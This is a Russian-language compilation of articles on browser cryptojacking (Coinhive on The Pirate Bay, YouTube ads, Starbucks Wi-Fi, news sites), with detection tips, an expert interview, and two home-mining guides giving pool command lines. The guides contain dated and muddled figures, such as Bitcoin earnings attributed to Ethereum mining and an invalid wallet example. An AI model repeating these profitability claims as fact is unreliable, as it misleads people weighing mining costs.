Содержание

Майнить криптовалюту можно прямо через браузеры пользователей. Это уже делают Pirate Bay и хакеры

В минувшую субботу, 16 сентября 2017 года, пользователи одного из крупнейших торрент-трекеров сети, «непотопляемого» The Pirate Bay, обратили внимание, что при посещении некоторых страниц сайта нагрузка на процессор резко возрастает. Как выяснилось, причиной тому стал криптовалютный майнер, который встроили прямо в код сайта при помощи JavaScript.

При ближайшем рассмотрении оказалось, что майнер предоставлен сервисом Coinhive, который предлагает владельцам сайтов конвертировать мощности CPU посетителей в криптовалюту Monero. При этом майнер работал не на всех страницах ресурса. Журналисты Torrent Freak сообщают, что функцию активировали для страницы с результатами поиска и на страницах категорий, на главной странице сайта, а также страницах отдельных раздач майнер не работал.

Представители ресурса подтвердили Torrent Freak, что трекер не взломали. Администрация проводила кратковременные испытания (майнер проработал около 24 часов) новой модели монетизации.  По словам операторов The Pirate Bay, в будущем встроенный манер, вероятно, сможет полностью заменить собой обычную рекламу.

Блокировать такой майнер можно отключением Javascript, установкой соответственных расширений для браузера (к примеру, NoScript и ScriptBlock), а также через блокировщик рекламы, добавив URL в черный список (не самый надежный вариант, ведь адрес может меняться).

Проделать эти операции будет совсем не лишним, так как подобный способ монетизации за последнее время успел опробовать не только The Pirate Bay. В конце прошлой недели специалисты компании ESET зафиксировали ряд очень похожих кампаний: на страницах российских и украинских сайтов появилась вредоносная реклама, в тайне от пользователей использующая их браузеры для майнинга. На графиках ниже можно увидеть распределение кампаний по странам и конкретным сайтам.

В этом случае злоумышленники тоже используют JavaScript и модифицированную версию майнера MineCrunch, также известного как Web Miner. Этот скрипт был создан еще в 2014 году, специально для майнинга криптовалют через браузеры.

Так как работа майнера значительно влияет на производительность устройства, и не заметить происходящее сложно, майнинговую рекламу стараются внедрять на сайты с потоковым видео или браузерными играми. Такие ресурсы сами по себе заметно нагружают систему и потребляют ресурсы, так что пользователь может не заметить работающий на фоне манер. Более того, на таких сайтах пользователи проводят много времени, что сулит операторам адвари бОльшие прибыли.

Как работает эта схема

Аналитики ESET пишут, что им удалось обнаружить скрипты для майнинга Monero, Feathercoin и Litecoin, но Monero в настоящий момент является главным приоритетом для злоумышленников. Так, конфигурация Litecoin-майнера пуста, а в случае Feathercoin все настройки остались дефолтными, даже адрес в точности повторяет демонстрационную страницу с GitHub.

Также исследователи заметили похожую кампанию, но направленную на майнинг Zcash, которой, судя по всему, управляет другая хакерская группа. В этом случае для «доставки» майнера не используется вредоносная реклама, но JavaScript-код внедряется непосредственно на сами сайты (точно так же, как в случае The Pirate Bay).

Стоит сказать, что сами по себе майнеры для браузеров – не такое уж новое явление. К примеру, предлагающий такие услуги сервис Bitp.it появился еще в 2011 году, но в итоге был закрыт. Также в 2015 году генеральная прокуратура штата Нью-Джерси закрыла аналогичный ресурс Tidbit, предлагавший владельцам сайтов майнер, который будет эксплуатировать компьютеры посетителей. Тогда власти сочли такую деятельность нелегальной, сродни хакингу, ведь Tidbit не уведомлял пользователей о происходящем и не спрашивал их разрешения.

Майнинг Monero за счет пользователей YouTube

Чаще всего люди устанавливают майнеры на свои компьютеры сознательно и сами — хотят приобщиться к майнингу криптовалют и немного заработать. Однако в 2017 году злоумышленники догадались скрытно подкидывать их на чужие компьютеры через специальные зловреды-загрузчики, чтобы зарабатывать больше — и за чужой счет, не оплачивая расходы на «железо» и электричество.

Потом ушлые любители дармовой криптовалюты научились встраивать в сайты безобидные специальные скрипты — веб-майнеры — и пользоваться компьютерами многочисленных жертв, не устанавливая вредоносные программы на каждый из них. Так у них получалось охватить больше жертв, в том числе и среди пользователей смартфонов.

Теперь киберпреступники придумали новую схему: вместо того чтобы вставлять скрипты для майнинга в код самого сайта, кто-то решил встраивать их в рекламные объявления на YouTube, которые затем без участия злоумышленников распространятся по множеству страниц и видеороликов.

Как работает майнинг через рекламу

Дело в том, что в рекламные объявления можно встроить программный код JavaScript. Обычно это делают для пущей интерактивности — «Кликни, чтобы сбить самолет!». Ну или чтобы следить за поведением пользователей: «смотрел котиков 10 минут — надо в следующий раз предложить кошачий корм». Но ничто не мешает злоумышленникам вставить в рекламу JavaScript для майнинга — чаще всего для этих целей использовался известный веб-майнер Coinhive. Впрочем, в каждом десятом случае встречался и написанный, видимо, самими злоумышленниками Javascript-веб-майнер, позволяющий сэкономить на комиссиях, отчисляемых создателю Coinhive.

Дальше, в сущности, механизм тот же, что и у остальных веб-майнеров: вы заходите на сайт, запускаете видео, а компьютер начинает генерировать криптовалюту в пользу тех, кто разместил скрипт, — и, как следствие, страшно тормозить.

Более того, преступникам хватило наглости в части баннеров со скрытым майнером предлагать жертвам фальшивые антивирусы. Кликнув по сообщению о заражении и скачав такую программу, пользователь вместо защиты получал зловред.

Видеохостинг стал платформой для атаки неспроста. Во-первых, как мы говорили, механизм показа рекламы на сайте делает за злоумышленников значительную часть работы по распространению майнера. Кстати, любопытный факт: при настройке объявлений злоумышленники, судя по всему, выбрали своей аудиторией пользователей из Франции, Испании, Италии, Японии и Тайваня — именно в этих странах зарегистрированы зловредные показы.

Во-вторых, на YouTube люди проводят достаточно много времени, а чем дольше компьютер работает над задачкой по генерации криптовалюты, тем больше он ее создаст. Наконец, пользователи привыкли доверять давно знакомым и известным сайтам, таким как YouTube, тем более что за ним стоит сам Google. Поэтому если видео начинает тормозить, это с большой вероятностью спишут на интернет-соединение или чрезмерные запросы других запущенных программ, а не на проблемы с безопасностью видеохостинга.

Ну поработает майнер чуток на вашем компьютере на благо кого-то там — что в этом такого? Почему нельзя просто оценить чужую смекалку и дать преступникам заработать пару виртуальных монет?

  • Вы тратите электричество и страдаете от медлительности программ, а кто-то другой получает деньги — едва ли вы этого хотите.
  • В процессе майнинга компьютер работает на износ, а дымок из системного блока надолго внесет вас в списки противников криптовалют.
  • Майнинг без вашего ведома — это сплошная морока. Хотите обработать фотографии из отпуска в Photoshop, запустив на фоне любимый микс из YouTube? Придется изрядно попотеть (компьютеру — в первую очередь), чтобы хотя бы открыть редактор. То же самое, кстати, касается игр!

Схемы для заработка на веб-майнерах становятся все изощреннее, но защититься от них по-прежнему довольно просто. Главное — позаботиться о безопасности компьютера и поставить правильный антивирус. К примеру, Kaspersky Internet Security умеет обнаруживать подобные скрипты на любых сайтах — с ним никто не сможет использовать вашу машину для добычи криптовалюты, не говоря уже о доставке троянов и стандартных скрытых майнеров, которые пока никто не отменял.

Наиболее выгодный способ майнинга криптовалют

У многих пользователей после знакомства с цифровой валютой возникает вопрос, какие именно электронные деньги выгодней всего майнить, а также где и каким способом. В этом материале рассмотрен наиболее выгодный на сегодняшний день вариант.

Начнем с того, что каждые пару месяцев прибыльность майнинга уменьшается в связи с тем, что о нем узнает все больше людей. Свою лепту недавно внес и просевший в два с лишним раза курс биткоина. Для сравнения, зимой наиболее выгодные с точки зрения майнинга видеокарты можно было окупить за два месяца, а сейчас этот процесс занимает 6 и более месяцев.

Означает ли это, что поезд ушел окончательно? Спекулировать на эту тему не будем, но в 2009 году майнинг биткоинов был также абсолютно не прибылен, а всего через пару лет люди, потратившие несколько недель на добывание монет, заработали на подскочившей стоимости довольно большие деньги. Не исключено, что цены на биткоин и другие криптовалюты ожидает еще несколько скачков в будущем, и небольшое по текущим меркам количество монет может окупиться сторицей. Но опять же, никакой гарантии того, что это принесет свои дивиденды, никто дать не может.

Все написанное ниже будет посвящено наиболее эффективному способу получения коинов и ответам на вопросы: чем майнить, где майнить, как майнить, и в какой-то мере что именно майнить. Более выгодного способа майнинга в пределах погрешности в несколько процентов на данный момент не существует.

Итак, начнем с вопроса номер один.

 

Что майнить?

Ответить на этот вопрос очень сложно. И как бы банально это не прозвучало, майнить лучше всего, наверное, биткоин – в первую очередь с точки зрения надежности. С другой стороны, при прочих равных, коэффициент увеличения его цены, скорее всего, будет ниже, чем у одного или нескольких альткоинов, которые на текущий момент стоят буквально копейки. Из альтернативных ЦВ на данный момент стоит присмотреться к Litecoin, Dogecoin и, возможно, Blackcoin. Это субъективная точка зрения, но именно эти три цифровые валюты имеют на текущий момент наилучшие показатели перспективности.

Самостоятельно со списком криптовалют можно ознакомиться в этих списках: coinmarketcap.com, www.cryptmarketcap.com.

 

Чем майнить?

Поскольку этот материал предназначен в первую очередь для обычных владельцев домашних компьютеров, то майнинг будет рассматриваться исключительно с точки зрения использования видеокарт. ASIC-платы для sha256 (биткоин) обходим стороной сразу в связи с их высокой стоимостью. ASIC-платы для scrypt с приличной производительностью пока еще не появились в продаже, да и вряд ли обычный пользователь захочет сразу вкладывать в них сумму в районе $1000 (за средние по соотношению цена/производительность платы). Тем не менее, ссылку на сайты производителей наиболее перспективных ASIC-плат для scrypt на всякий случай оставим: zeusminer.com, www.kncminer.com/categories/litecoin-mining-hardware.

Эти платы гораздо выгоднее с точки зрения производительности за киловатт и требуют в среднем в 20 раз меньше электричества, чем видеокарта сопоставимой производительности.

Но вернемся к видеокартам. Наиболее выгодную видеокарту с точки зрения khash/$ или khash/ватт можно подобрать в этой таблице.

На текущий момент в категории производительность/стоимость, как ни странно, лидируют не новейшие модели, а ветераны в лице радеонов 7870, 5970, 5870, R9 270X. Правда, стоит отметить, что абсолютная производительность этих видеокарт относительно невысока, и в случае если планируется установить в компьютер более одной платы, дополнительные расходы на БП, PCI-E райзеры, возможно, новую материнскую плату с несколькими слотами PCI-e, могут оказаться значительными и в таком случае лучше сразу брать что-нибудь более производительное — например, R9 280x.

PCI-E райзер — это шлейф длиной 20-30 см, позволяющий вынести видеокарту, что улучшает ее охлаждение, и подключать PCI-E 16х видеокарты в слот PCI-E 1x. Производительность при этом не падает, поскольку при майнинге не требуется интенсивный обмен данными по шине. Внимание, подключайте переходники PCI-E 1х только к соответствующем разъему и не используйте его со слотом 16x, поскольку материнская плата попробует подать дополнительное питание для полноценного слота по ограниченному количеству контактов и, скорее всего, спалит как сам слот, так и райзер.

 

Где майнить?

Начнем с того, что майнить биткоины с помощью видеокарт невыгодно. Проще всего это объяснить на примере. Если добывать самые прибыльные на данный момент альткоины и затем обменивать их на биткоины, то в среднем выйдет в 50 раз больше биткоинов, чем при майнинге напрямую.

Какие альткоины для этого следует добывать? К счастью, знать ответ на этот вопрос необязательно. Существуют так называемые Profitable Pool, которые автоматически отслеживают курс альткоинов и добывают наиболее выгодные на текущий момент, нередко переключаясь между ними буквально каждые несколько минут.

В последнее время число таких пулов постоянно растет, но лишь некоторые из них демонстрируют хорошие показатели прибыльности, с которыми можно ознакомиться на сайте PoolPicker.

Как видно, практически каждый день ситуация меняется, и не исключено, что наиболее прибыльный сегодня пул завтра окажется наименее прибыльным. Тем не менее, простой ответ существует. Появившийся совсем недавно пул NiceHashв среднем демонстрирует наилучшие показатели за несколько дней. Это объясняется очень просто. NiceHash является не просто пулом, в обычном понимании этого слова, а сайтом, на котором можно сдавать в аренду мощность своего компьютера, поэтому и прибыль здесь получается немного выше.

Под арендой ни в коем случае не подразумевается использование вашего компьютера в любое необходимое арендатору время. Майнинг вы запускаете самостоятельно когда вам удобно и можете в любой момент отключить его, так что ни о каком выполнении непонятных расчетов на вашем компьютере речь не идет. На самом деле, как и в традиционных пулах, вы добываете коины для сервера, который является посредником для передачи их арендатору.

К плюсам NiceHash можно отнести и выплаты, происходящие 4 раза в день, в то время как другие пулы делают это, как правило, раз в сутки, и то лишь при условии наличия определенной суммы на балансе.

Если же вам из интереса хочется самому узнать и рассчитать прибыльность коинов, то это можно сделать с помощью сайтов: www.coinchoose.com/litecoin.php, www.coinwarz.com/miningprofitability/litecoin

 

Как майнить?

Рассмотрим майнинг на примере NiceHash. Настройка другого пула принципиально ничем не отличается.

Для начала понадобится программа Sgminer, поскольку Cgminerс NiceHash не работает и выдает ошибку Rejected. На официальном сайте Sgminer доступен только исходный код клиента, который можно скомпилировать самостоятельно при наличии требуемых знаний, а готовую версию Sgminer для Windows можно скачать на sgminerwindows.

Для работы также потребуется кошелек для биткоин, например, MultiBit.

Регистрация на пуле NiceHash не требуется, поскольку в качестве имени пользователя прописывается адрес биткоин-кошелька, который можно посмотреть в MultiBit.

Для запуска майнинга необходимо возле исполняемого файла sgminer.exe создать bat-файл с любым названием, например NiceHash.bat. Содержимое bat-файла должно быть приблизительно следующим (одной строкой):

Sgminer -o stratum+tcp://stratum.nicehash.com:3333 -u 1FL7DA4QUTjuiMNeix2P3TDHvefnyw3Ek2 -p x —temp-target 80 —auto-fan

-o stratum+tcp://stratum.nicehash.com:3333 — адрес пула

-u 1FL7DA4QUTjuiMNeix2P3TDHvefnyw3Ek2 — имя пользователя, а в данном случае адрес биткоин-кошелька

-p x — пароль, в качестве которого можно использовать что угодно

—temp-target 80 —auto-fan — sgminer возьмет на себя управление кулером и будет поддерживать температуру видеокарты не выше 80 градусов

Для повышения производительности в строку можно добавить активацию экспериментальной kernelzuikkis. Это может ускорить видеокарту на дополнительные 2.5%.

-k zuikkis

Данное ядро работает хорошо не со всеми видеокартами, поэтому перед его использованием сравните количество кхешей с ним и без него.

Также в bat-файле должны находиться настройки производительности, уникальные для каждой конкретной видеокарты. Посмотреть их можно здесь. Еще лучше прочитать материал Майнинг криптовалют на примере Dogecoin, чтобы разобраться в этом вопросе чуть подробнее.

Желательно, хотя и не обязательно, добавить в строку запасной пул. Если на NiceHash закончатся заказы, то майнер будет бездействовать, поэтому рекомендуется в качестве бэкапа прописать любой другой Profitable Pool.

После сохранения и запуска bat-файла окно Sgminer должно выглядеть приблизительно так:

 

Итоги

Прибыльность на PoolPicker рассчитывается для 1 mHash за день, то есть в среднем с такой производительностью можно получить около 0.0075 биткоина в сутки. Таким образом, один биткоин можно заработать за 133 дня. Совсем недавно, буквально два месяца назад, его можно было получить за 40 дней. Стоит ли игра свеч, решать вам. В начале прошлого года один биткоин стоил $10, а в конце уже $1100, так что изменение его цены в большую сторону возможно, хотя и не гарантированно. Кстати, если вы хотите включить стоимость электричества в стоимость майнинга, то это приблизительно 20% на текущий момент. То есть полученные биткоины необходимо умножать где-то на 0.8, а остальное можно сразу обменивать для покрытия расходов на электричество. Обмен на доллары и гривны можно производить на бирже https://btc-e.com и затем выводить деньги на пластиковую карту.

Как уже упоминалось, вероятность большого скачка цен на альткоины через несколько лет более вероятна, но указать явного фаворита в данный момент не сможет никто. Если вас вдруг заинтересовал майнинг альткоинов, а не биткоина, то описанная выше схема опять же наиболее выгодна. В этом случае полученные биткоины (или скорее доли биткоина) дополнительно понадобится обменивать на бирже на интересующие альткоины. В качестве биржи для обмена можно посоветовать Prelude.io

Покупка альткоинов вместо их майнинга включает в действие механизм, известный как buying pressure. Наличие спроса приводит к тому, что предложения с наименьшей ценой быстро раскупаются на биржах, и цена начинает ползти вверх. Это приводит к медленному росту в краткосрочной перспективе и увеличению цен на несколько порядков в долгосрочной перспективе.

Если некоторые моменты в тексте вызвали дополнительные вопросы, почитайте также материалы Что такое криптовалюта и как она работает и Майнинг криптовалют на примере Dogecoin.

Хакеры научились майнить криптовалюты через Wi-Fi в Starbucks


Фото: iStock


Злоумышленники взломали публичную сеть Wi-Fi в одном из кафе Starbucks в столице Аргентины и воспользовались компьютерами клиентов для майнинга криптовалют. Об этом пишет CNBC.



Предприниматель Ноа Динкин (основал компанию stensul, разработавшую платформу для создания электронных писем в крупных компаниях) в своем Twitter опубликовал скриншот с html-кодом страницы, на которую перенаправлял бесплатный Wi-Fi в одном из заведений Starbucks в Буэнос-Айресе. По его словам, код спровоцировал задержку в работе браузера, когда он подключался к интернету.

Hi @Starbucks @StarbucksAr did you know that your in-store wifi provider in Buenos Aires forces a 10 second delay when you first connect to the wifi so it can mine bitcoin using a customer's laptop? Feels a little off-brand.. cc @GMFlickinger pic.twitter.com/VkVVdSfUtT

— Noah Dinkin (@imnoah) 2 декабря 2017 г.


«Привет, Starbucks. А вы знали, что ваш провайдер Wi-Fi в Буэнос Айресе инициирует 10-секундную задержку, когда вы только подключаетесь к Wi-Fi, и он может майнить биткоин, используя ноутбук клиента?»


Эта задержка позволяла провайдеру Wi-Fi добывать биткоин, используя вычислительные мощности компьютеров клиентов, отмечает издание. По данным порталов Hackread и Blockexplorer, на компьютерах клиентов Starbucks запускался скрипт, который майнил криптовалюту Monero.


В Hackread предположили, что криптовалюту добывал не интернет-провайдер, а хакеры, которые недавно добавили этот же скрипт на 5 тысяч других сайтов. А уже в ночь на 12 декабря Starbucks объявил, что интернет-соединение в кафе вновь стало безопасным.

As soon as we were alerted of the situation in this specific store last week, we took swift action to ensure our internet provider resolved the issue and made the changes needed in order to ensure our customers could use Wi-Fi in our store safely.

— Starbucks Coffee (@Starbucks) 11 декабря 2017 г.


В начале ноября эксперты из «Лаборатории Касперского» и ESET нашли ворующие биткоины программы. Злоумышленники эксплуатировали невнимательность пострадавших. Так, в Google Play загрузили программу, которая маскировалась под официальное приложение биржи Poloniex (у нее нет приложения), а в «Лаборатории Касперского» обнаружили вирус CryptoShuffler, который получал доступ к криптокошелькам пользователей.


А в сентябре компания ESET рассказала, что хакеры создали программу-майнер JS/CoinMiner.A, которая втайне от пользователей добывает криптовалюту в браузерах. 65% всех атак веб-майнера приходится на Россию.



Подписывайтесь на наш канал в Telegram!

Как майнить Ethereum — статьи PCshop.UA


Валерий — эксперт техники интернет-магазина PCshop.UA
Эксперт техники

Недавно была анонсирована новая система, которая внесла значительное влияние на область криптовалют. Платформа получила название «Ethereum». Теперь стало гораздо выгоднее майнить на обновленных видеокартах для майнинга, а также это позволяет пользователям создавать алькоины.

Например, на видеокарте nVidia GTX 970 есть возможность получить примерно 0,33 Биткоина в месяц, а это около 138 долларов. Некоторым пользователям удавалось намайнить более 160 долларов, но стоит отметить, что цена Ethereum за прошлые пару недель немного упала.

В этой статье мы постараемся рассказать о наиболее легком способе майнинга с помощью Ethereum. Стоит сказать, что даже опытному пользователю на остальных криптовалютах придется достаточно долго разбираться, чтобы точно понять схему работы. Не стоит объяснять, почему показанный далее способ является наиболее простым. Он стал доступен только в начале марта сразу после запуска сервиса ethermine.org.

На сервисе ethermine.org нужно скачать утилиту майнер QTMiner для Windows или Ubuntu, они могут конектиться напрямую вместе с пулом ethermine.org.

Запустить утилиту нужно со специализированными настройками через bat файл для Windows или же скрипт для Linux. Если вы работаете на операционной системе Windows вам необходимо создать файл с расширением .bat в ту папку, где располагается qtminer.exe. Там вы пишете такие параметры: 

• qtminer.exe -s eu1.ethermine.org:4444 -u 0x3445gj5k4f9jh0d0hh5944k46.rig1 -G

Где «eu1.ethermine.org:4444» является адресом сревиса. Данный параметр не нужно изменять, если территориально вы находитесь ближе именно к Европе.

«.rig1» — это имя вашего компьютера. Оно может быть любым и изменять его нет необходимости. От адреса кошелька, который находится перед именем ПК, необходимо отделить точкой. 

«0x3445gj5k4f9jh0d0hh5944k46» — это значение вам необходимо изменить. Это адрес вашего кошелька на Ethereum. Меняете на свой и после этого можно смело запускать майнер.

Получить адрес можно через криптобиржу. Можно использовать bittrex или poloniex. Для получения профиля необходимо совершить регистрацию и сгенерировать новую ссылку для приема  Ethereum.

Если на thermine.org прописать адрес собственного кошелька, вам будет показана скорость майнинга в MH/s (мегахэши в секунду), а также примерную сумму, которую может намайнить ваш компьютер за сутки, неделю или же месяц.

Выбор видеокарты для Ethereum

Для эффективного майнинга пригодится видеокарта, которой не более двух-трех лет. Могут подойти и более старые версии, но их возможности стоит проверять на практике. Отлично подойдут видеокарты AMD RADEON RX 470 и AMD RADEON RX 480. Они значительно быстрее других моделей, что позволит получить большую сумму майнинга.

Каждая видеокарта работает в индивидуальном режиме, а потому если стандартная работа будет неэффективной, стоит обратиться к разделу Mining на официальном форуме Ethereum.  На этой странице вы сможете понять сколько MH/s может выдать установленная у вас видеокарта в случае наиболее оптимальных параметрах.

Охлаждение видеокарты

Процесс майнинга вероятно будет нагружать вашу видеокарту похлеще требовательных игр, а потому она будет сильно нагреваться. Многие пользователи советую для майнинга выбирать видеокарты на гарантии. Так как если тщательно не следить за рабочей температурой — видеокарта можно полететь.

Для проверки нагревания рекомендуем использовать программу MSI Afterburner. Она позволит вам настроить скорость вращения кулера и предел температуры. Стоит сказать, что для всех видеокарт есть свое максимальное значение, но большинство пользователей рекомендует не превышать 80 градусов.

Как и зачем майнить Ethereum

Если у вас есть профиль на bittrex или poloniex, то вы можете там обменять Ethereum на Bitcoin. Полученные средства вы можете применить для покупки игр на Humble Bundle, или компьютерных комплектующих на Newegg, или же перевести Bitcoin на btc-trade.com.ua и затем вывести на карту вашего банка.

Выбирай и покупай видеокарту для майнинга у экспертов техники!

Эксперты рекомендуют видеокарты ASUS

Как понять, что с вашего ПК майнят биткоины без разрешения. И как этого не допустить

21 Сентября, 2017,
16:15

43986

Недавно один из старейших торрент-трекеров The Pirate Bay уличили в эксплуатации мощностей процессоров его пользователей для майнинга (без их ведома). Администрация сайта использовала сервис CoinHive, встраивая простой Javascript-код в сайт. Когда пользователь заходит на страницу со скриптом, часть мощности процессора его компьютера использовалась для майнинга. Такой подход позиционировался как альтернатива показу рекламы.

 

Такие случаи — не единичны. Еще в апреле 2013 года, когда ажиотаж вокруг криптовалют только разгорался, сотрудник игровой сети ESEA (которая предоставляла игрокам Counter-Strike античитинговый софт) майнил для себя биткоины на сети из 14 000 компьютеров игроков — по тогдашнему курсу он даже успел намайнить 30 биткоинов или же порядка $3700 (на то время). ПК-геймеры — идеальная аудитория для такой схемы, ведь они как правило тратятся на апгрейды «железа». Сегодня пользователь может наткнуться на встроенный в браузер или загружаемый скрипт для майнинга на популярных сайтах. Один такой случай описывает эксперт по информационной безопасности Дмитрий Снопченко. 

Зайдя на сайт professorweb.ru, он заметил, что компьютер начинает подвисать. Проверив, в чем дело, он обнаружил в исходниках сайта JS-код, который позволяет веб-мастеру майнить криптовалюту прямо из браузера и без ведома пользователя.

Пользователь заходит на сайт и мощности его процессора начинают частично использоваться под майнинг. В этом случае (как и в истории с The Pirate Bay) речь шла о решении под названием CoinHive, которое открыто продвигается в интернете под слоганом Monetize Your Business With Your Users’ CPU Power. На сайте CoinHive — детальная инструкция для веб-мастера, как создать скрипт и поместить на своем сайте. При этом, к примеру, с помощью VirusTotal этот скрипт нельзя обнаружить. 

«Скрипт замечен не только на этом сайте, но и на некоторых онлайн-кинотеатрах. Так что пока вы смотрите пиратский фильм бесплатно, не обольщайтесь — кто-то на вас все равно заработает», — пишет Дмитрий. 

По просьбе редакции Дмитрий сформулировал несколько несложных советов о том, как заметить «беспризорные» скрипты-майнеры у себя на компьютере и как от них избавиться: 

  • Если вы замечаете, что потребление ресурсов компьютера резко выросло (сильнее зашумел кулер, начал нагреваться ноутбук, начали подвисать программы), нелишним будет зайти в диспетчер задач (в Windows он вызывается по Ctrl-Shift-Esc, в Chrome есть свой диспетчер задач) и посмотреть, какая программа за это в ответе. Там же в разделе «Процессы» можно проверить нагрузку на ЦП и оперативную память. Если у вас запущена какая-то «тяжелая» программа, (к примеру, вы монтируете HD-видео, у вас работает AutoCAD или MatLab) — это нормально. Если же все, что у вас запущено — это браузер с 5-7 вкладками, стоит проверить все внимательней. 
  • Если вы видите подобный процесс в диспетчере, можно там же попробовать остановить его и посмотреть, что будет дальше — потребление ресурсов компьютера должно резко упасть.
  • Если процесс самовосстановился через какое-то время — это тревожный признак. Можно попробовать отключить компьютер от интернета и посмотреть, упала ли нагрузка. Если нет — проверить ПК свежеобновленным антивирусом. Такие скрипты могут запускаться не только из браузера, но и с ПК (к примеру, если до этого скрипт-дроппер запустился на компьютере и скачал основную программу). 
  • Можно провести более тщательную проверку. Проверить исходный код страницы, которая «грузит» компьютер. Прямо из диспетчера можно открыть расположение файла, поискать его по названию в Google, проверить в базе VirusTotal и удалить, если он покажется подозрительным. 
  • В сети появились расширения, которые позволяют отлавливать такие программы-майнеры. К примеру, Денис Ширяев (ранее занимался Dirty.ru) рекомендовал в Telegram расширение для Chrome под названием No Coin. Перед установкой лучше его также проверить (у него неплохой рейтинг, но пока мало отзывов). 

«Схем загрузки майнера — сотни. Как-то его даже вшили в игрушку, которую выложили на торрент за два дня до релиза, и которую игроки тут же кинулись скачивать и ставить. Для пользователей действуют все обычные правила для интернет-безопасности: обязательное наличие антивируса класса Intertet Security, понимание социальной инженерии (не открывать подозрительные ссылки, ссылки на то, чего не ожидали получить) и здоровая параноя», — говорит Дмитрий. 

Напомним, с января следующего года в одном из кантонов Швейцарии гражданам разрешат платить налоги частично в биткоинах. 

Как на посетителях сайтов зарабатывают криптовалюту

Некоторое время назад ряд онлайновых СМИ столкнулись с проблемой — читатели при заходе на их веб-сайты испытывали определенные трудности с загрузкой страниц, а работа их компьютера замедлялась. Подобную ситуацию обнаружило у себя и Delo.UA, наши читатели стали жаловаться на замедление работы их устройств при заходе на наш сайт. Как выяснили впоследствии технические специалисты нашего издания, один из партнеров без ведома компании устанавливал на нашем сервере скрипт, который майнил криптовалюту. После обнаружения скрипт был отключен, партнер уведомлен о недопустимом поведении, а читателям были принесены извинения.

Немного дальше решили пойти в Медиагруппе 1+1. Там выявили вмешательство в работу сайтов группы, целью которого была скрытая добыча криптовалюты Monero, «вероятно, в интересах международного стартапа Newzmate». «Департамент 1+1 digital провел расследование и обнаружил, что через API компании Newzmate в браузеры читателей новостных сайтов группы с домена api.traq.li загружался скрытый скрипт CoinHive для добычи криптовалюты Monero. Таким образом мошенники обогащались за счет ресурсов компьютеров пользователей без их ведома», — сообщала пресс-служба медиагруппы. Как тогда выяснили в 1+1, программа попала на сайты группы после покупки сервиса электронных рассылок Traqli, разработчиком которого является Newzmate. 1+1 обратились с заявлением по этому вопросу в Департамент киберполиции Национальной полиции Украины, считая, что компания-партнер несанкционированно вмешалась в работу их компьютерных сетей.

Подпишитесь на канал DELO.UA

Как расценивать такие действия партнеров? Как на них реагировать? Насколько это законно? Можно ли защитить свои веб-ресурсы технически и юридически от таких действий? Об этом Delo.UA расспросило эксперта компании KPMG Николая Легкодимова.

Недавно некоторые наши коллеги пострадали от такой напасти как партнерский скрипт с внедренным майнингом криптовалют. По сути это было мошенничество. Насколько частой является такая практика, когда одни компании зарабатывают на других, обманывая их через такие партнерские вещи?

Недавно у ThePirateBay (сайт-индексатор торрентов) был эксперимент — люди заметили, что когда ты заходишь на страницу, повышается использование процессора и вычислительная мощность идет на работу скрипта, который занимается майнингом, а остальные процессы не в приоритете. Практика, с моральной точки зрения, спорная. На это можно посмотреть с двух сторон. С одной стороны — это канал монетизации, как в случае с ThePirateBay. С другой — без спроса используются ресурсы вашего компьютера. А с третьей стороны — вы когда пользуетесь каким-либо приложением, оно так или иначе тоже использует ресурсы вашего компьютера.

Мне кажется, здесь вопрос лежит не в плоскости «законно-незаконно», а на уровне справедливости — ваши ресурсы используются, вы не зарабатываете на этом, а кто-то другой зарабатывает. Скорее всего это никак не регулируется. Это просто на уровне доверия внутри коммьюнити, либо это будет принято приемлемым, либо нет. Я допускаю, что это будет продолжаться. Грубо говоря — сейчас есть правильные способы коммерциализации бесплатного софта. На вашем домашнем компьютере, скорее всего, стоит какое-то ПО, которое работает по следующей модели — вы им пользуетесь бесплатно для ваших целей, но периодически можете видеть какую-то рекламу. Или внизу есть рекламная полоска. За ее счет и зарабатывают.

Я не исключаю, что в какой-то момент вы на это (майнинг — ред.) согласились — когда нажимали все эти «Принять», не обращая внимания. Это может быть каналом монетизации бесплатного софта — вы чем-то пользуетесь бесплатно, но при этом в то время, когда вы не работаете (возможно, ночью), она майнит в пользу этого софта. Если вы с этим согласны, то ничего принципиально плохого я в этом не вижу.

То есть нужно внимательно читать лицензионные соглашения.

Я думаю, что и в случае ThePirateBay, и в вашем случае — это был некий эксперимент: можно ли на этом заработать. Здесь есть некоторые технологические ограничения, связанные с тем, что система устроена так, что скрипт, запускаемый с браузера, не самый оптимальный вид майнинга.

Почему?

Архитектурно у него не тот уровень доступа, он действует в рамках мандата на браузер, он не может загрузить процессор так, как если бы специализированное программное обеспечение напрямую занималось майнингом. На этом можно заработать только если это большая база, миллионы пользователей. Те случаи, о которых я слышал, ThePirateBay из них самый крупный. Если у вашего сайта домашняя страница про любимую кошку и туда заходят 200 пользователей, и вы им загружаете скрипты в их компьютеры, то они много не намайнят.

Насколько это законно? Мы об этом не знали, это был партнерский скрипт, который был на наших страницах. Мы заходим на нашу страницу, она очень долго грузится. Оказалось, что там скрипт.

Говорить, законно или незаконно можно тогда, когда сформировано отношение к майнингу как к деятельности, у которой есть статус — хозяйственный, коммерческий. Этого нет. Если забыть о том, что на другом конце скрипта сидит человек, который со своего криптовалютного кошелька выведет деньги, то что сделал этот скрипт? Он загрузил ресурсы вашего компьютера не тем, чем вы ожидали. Это вопрос юридический или это вопрос доверия между автором контента с одной стороны и его потребителем с другой? На уровне справедливости с вашей стороны — вроде да, вы платите за электричество, которым питается ваш компьютер, который вы часто на ночь не выключаете. Почему ваш компьютер делает не то, что его просили?

С другой стороны, если это сам контент, бесплатный или условно бесплатный, — вы часто потребляете контент, за который не платите. Здесь не урегулирован вопрос. Есть многие бесплатные газеты и журналы, на которые люди заходят и пользуются этим контентом. Когда будет понятно, что майнинг законен в Украине и это является коммерческим способом создания стоимости, он будет внесен в коды как вид экономической деятельности, тогда возникнет юридический казус — за счет ваших ресурсов люди зарабатывают. А пока это выглядит так — ваш процессор просто загрузили тем, чем вы не хотели, и что?

Что для этого нужно? Чтобы майнинг был признан легальным способом заработка и для этого нужно было заключать договор? Или чтобы криптовалюты были признаны Национальным банком?

Я бы разделял эти вещи. То, что ваши ресурсы пытаются использовать — это ничем не отличается от того, что жильцы дома подключают к общему источнику энергии свою майнинговую ферму. Вроде, за это платит весь дом, но пользуются только они.

